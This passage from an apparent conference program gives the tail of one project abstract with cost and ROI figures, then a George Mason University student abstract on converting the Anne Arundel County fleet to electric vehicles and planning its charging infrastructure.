RRUMS will transport high-value travelers to airports and business districts and is estimated to have acquisition costs of $87,625,000, annual operational costs of around $500,000, with revenue of $21,835,684 per year, the profit is $40,731,840 in the first 10 years, with ROI of 19.96%, and Break-even in 6 years.

14:30
Norman Au (George Mason University, United States)
Emily Chen (George Mason University, United States)
Mukand Bihari (George Mason University, United States)
O'Ryan Lattin (George Mason University, United States)
Anne Arundel County Electric Fleet Conversion

ABSTRACT. According to the EPA, the transportation sector accounted for 29% of greenhouse gas emissions (GhG) in 2017. These emissions are due to the widespread ownership of personal vehicles, and a reliance of fossil-fuels as an energy source. As a result, average global surface temperatures have been increasing, leading to what is most commonly known as global warming—leading to a surge in extreme weather events, the spread of disease, and changing ecosystems. The International Panel on Climate Change (IPCC) states that the continuous use of fossil fuels can lead to catastrophic effects if global temperature increases by 2 degrees Celsius, but the effects can be reduced by limiting temperature increases to below 1.5 degrees Celsius by 2030.

Maryland has taken the IPCC’s deadline and plans to have 300,000 electric vehicles registered within the state by 2025, while reducing 40% GHG emissions by 2030. Additionally, with the state’s Renewable Portfolio Standard, 50% of the state’s energy must be generated from renewable sources. Anne Arundel County, MD, has considered these aforementioned goals in order to plan a full electric fleet conversion, supported by a sufficient charging system.

All electric vehicle (EV) types have been considered in the fleet conversion, which includes battery electric vehicles (BEVs), hybrid electric vehicles (HEVs), plug-in hybrid electric vehicles (PHEVs), and fuel-cell electric vehicles (FCEVs). With technological and market limitations within each electric vehicle type, the following design alternatives have been proposed—All BEV, Mixed BEV, HEV and PHEV, Mixed BEV, HEV, PHEV and FCEV, and Do Nothing. For the mixed EV fleet alternatives, an analysis has been conducted to determine which departments get which EV type. For all the design alternatives, an appropriate charging system design encompassing EV type and number of vehicles is provided. Additionally, suggestions to reevaluate current county electric infrastructure is provided to encompass the increased draw from the power grid as a result of charging electric vehicles.